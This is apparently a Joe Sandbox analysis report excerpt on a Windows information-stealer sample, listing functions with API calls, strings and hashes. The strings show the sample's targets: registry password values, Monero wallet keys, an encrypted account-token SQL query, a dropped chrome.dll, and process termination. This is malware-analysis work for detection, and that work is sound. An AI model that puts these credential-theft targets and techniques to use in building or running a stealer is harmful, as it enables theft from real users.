                            Function 000D7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 000D7374
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D7411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000D74B2
                            • HeapFree.KERNEL32(00000000), ref: 000D74B9
                            • task.LIBCPMTD ref: 000D75B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 2427e6c6be695fe40299b48713f31bfa73e4af53c06c2b58853d83fa001ab35d
                            • Instruction ID: 0beb84b93be2471ccc225d118bb079c8be91ddc2d7920d268c469c23367eabb6
                            • Opcode Fuzzy Hash: 2427e6c6be695fe40299b48713f31bfa73e4af53c06c2b58853d83fa001ab35d
                            • Instruction Fuzzy Hash: 5A6140B590425C9BDB25DB50DC41BD9B7B8BF44300F0085EAE649A6245EFB06BC9CFA1
                            Function 000E8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D4E188,00000000,?,000F0E14,00000000,?,00000000), ref: 000E82C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E82C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000E82E8
                            • __aulldiv.LIBCMT ref: 000E8302
                            • __aulldiv.LIBCMT ref: 000E8310
                            • wsprintfA.USER32 ref: 000E833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 19a7dd4f53de47024cc4324fbfb4d858e8970465dfc294e63236be89d7b34698
                            • Instruction ID: 92c73891ebfdcbc2464f9ec59bf95d4f55801c15d897d890115918e6878230fe
                            • Opcode Fuzzy Hash: 19a7dd4f53de47024cc4324fbfb4d858e8970465dfc294e63236be89d7b34698
                            • Instruction Fuzzy Hash: C02117B1E48248AFDB10DFD5CC4AFAEB7B8FB45B14F104509F619BB280D77869008BA5
                            Function 000D9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                            • wsprintfA.USER32 ref: 000D9E7F
                            • memset.MSVCRT ref: 000D9EED
                            • lstrcat.KERNEL32(00000000,?), ref: 000D9F03
                            • lstrcat.KERNEL32(00000000,?), ref: 000D9F17
                            • lstrcat.KERNEL32(00000000,000F12D8), ref: 000D9F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 000D9F7C
                            • memset.MSVCRT ref: 000D9F9C
                            • Sleep.KERNEL32(00001388), ref: 000DA013
                              • Part of subcall function 000E99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E99C5
                              • Part of subcall function 000E99A0: Process32First.KERNEL32(000DA056,00000128), ref: 000E99D9
                              • Part of subcall function 000E99A0: Process32Next.KERNEL32(000DA056,00000128), ref: 000E99F2
                              • Part of subcall function 000E99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E9A4E
                              • Part of subcall function 000E99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9A6C
                              • Part of subcall function 000E99A0: CloseHandle.KERNEL32(00000000), ref: 000E9A79
                              • Part of subcall function 000E99A0: CloseHandle.KERNEL32(000DA056), ref: 000E9A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 3242155833-2746444292
                            • Opcode ID: 5b8241d0d507d99270c6960ed77995e5e78910be468f61834335d8cb092f91e5
                            • Instruction ID: 163a8ecbafb18c5f9566757d85be433afccef8f2e09dea8433b9386c047e9df1
                            • Opcode Fuzzy Hash: 5b8241d0d507d99270c6960ed77995e5e78910be468f61834335d8cb092f91e5
                            • Instruction Fuzzy Hash: A25186B1A44318ABEB21DB60DC86FDA737CAF45700F004598B60DAB2C1DB75AB84CF51
                            Function 000D60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                            • InternetOpenA.WININET(000F0DFB,00000001,00000000,00000000,00000000), ref: 000D615F
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000D61DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000D6203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 000D622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 000D6299
                            • InternetCloseHandle.WININET(?), ref: 000D62A3
                            • InternetCloseHandle.WININET(00000000), ref: 000D62B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 50ba3aaf4173e6bc22b2294168b8bddd11854c3208cc242ba19964aeb6cad816
                            • Instruction ID: d18a79bb3f8f2762feb4b9e30071b1635d0421c502720e79d7d89a46830adeb9
                            • Opcode Fuzzy Hash: 50ba3aaf4173e6bc22b2294168b8bddd11854c3208cc242ba19964aeb6cad816
                            • Instruction Fuzzy Hash: C95151B1A00318AFDB20DF90CC95BEE77B9AB45301F108199F605A72C1DB756A89CFA5
                            Function 0015012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 0015024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 0015035B
                            • CatchIt.LIBVCRUNTIME ref: 001503AC
                            • CallUnexpected.LIBVCRUNTIME ref: 001504C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction ID: 40ded177036cc65a3a125af40a64fe11600956ba0995fd2c516fe3443438303d
                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction Fuzzy Hash: 03B17B71800609EFCF26DFE4C8819AEBBB5BF18312F14416AED256F212D731DA59CB91
                            Function 000DBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • lstrlen.KERNEL32(00000000), ref: 000DBC6F
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 000DBC9D
                            • lstrlen.KERNEL32(00000000), ref: 000DBD75
                            • lstrlen.KERNEL32(00000000), ref: 000DBD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 6a85dd678af90641cfdeceee449e9091b66f2dde4b4ff63a815a8a541e811f69
                            • Instruction ID: 21d0f00ee9d0d26151b20a9b454eb52900747baf8bbbf6864bcb39b5d8c8ed96
                            • Opcode Fuzzy Hash: 6a85dd678af90641cfdeceee449e9091b66f2dde4b4ff63a815a8a541e811f69
                            • Instruction Fuzzy Hash: A6B14C72E102489FCB14EBA1CCA6EEE7379AF59300F414569F10676193EF347A48CB62
                            Function 000E6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: b7862603e3b3b4cd9dc014ea8adb440cd10510cadf3bc0df4ab91ff0b7194759
                            • Instruction ID: 5973e27e9b48d8d7217b3f0c58be0d25615d58b3d52d05fd131bb0f4f25c975e
                            • Opcode Fuzzy Hash: b7862603e3b3b4cd9dc014ea8adb440cd10510cadf3bc0df4ab91ff0b7194759
                            • Instruction Fuzzy Hash: 6BF0E230E0C208EFD3409FE0FC4879CBBB8EB06707F0041A6F609A6191C6715A40CF52
                            Function 000E08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,000E08DC,C:\ProgramData\chrome.dll), ref: 000E9871
                              • Part of subcall function 000DA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000DA098
                            • StrCmpCA.SHLWAPI(00000000,00D49178), ref: 000E0922
                            • StrCmpCA.SHLWAPI(00000000,00D49188), ref: 000E0B79
                            • StrCmpCA.SHLWAPI(00000000,00D491B8), ref: 000E0A0C
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000E0C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 000E08CD
                            • C:\ProgramData\chrome.dll, xrefs: 000E0C30
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 54b788e7897f9b516d5aac76cf15b6a0255627d2c37aa180e07c80f089e1e9b1
                            • Instruction ID: 355f83d622557d1513900f4ecbe4c395e2e9661ad0a9b925a312f7c3383636f2
                            • Opcode Fuzzy Hash: 54b788e7897f9b516d5aac76cf15b6a0255627d2c37aa180e07c80f089e1e9b1
                            • Instruction Fuzzy Hash: AEA17871B002489FCB28EF65D996EED777AEF95300F11816DE40A5F352DB30AA05CB92
                            Function 0014F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 0014FA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0014FA27
                            • _ValidateLocalCookies.LIBCMT ref: 0014FAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0014FADB
                            • _ValidateLocalCookies.LIBCMT ref: 0014FB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 04a9b08f87e2c7f18051f5dd8b5de20cf723101e6a52d65197c4a11c8bba16df
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: 6541A534900219EFCF10DF68C885A9E7BB5FF49314F248169ED19AB3A1D731D906CB91
                            Function 000D5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
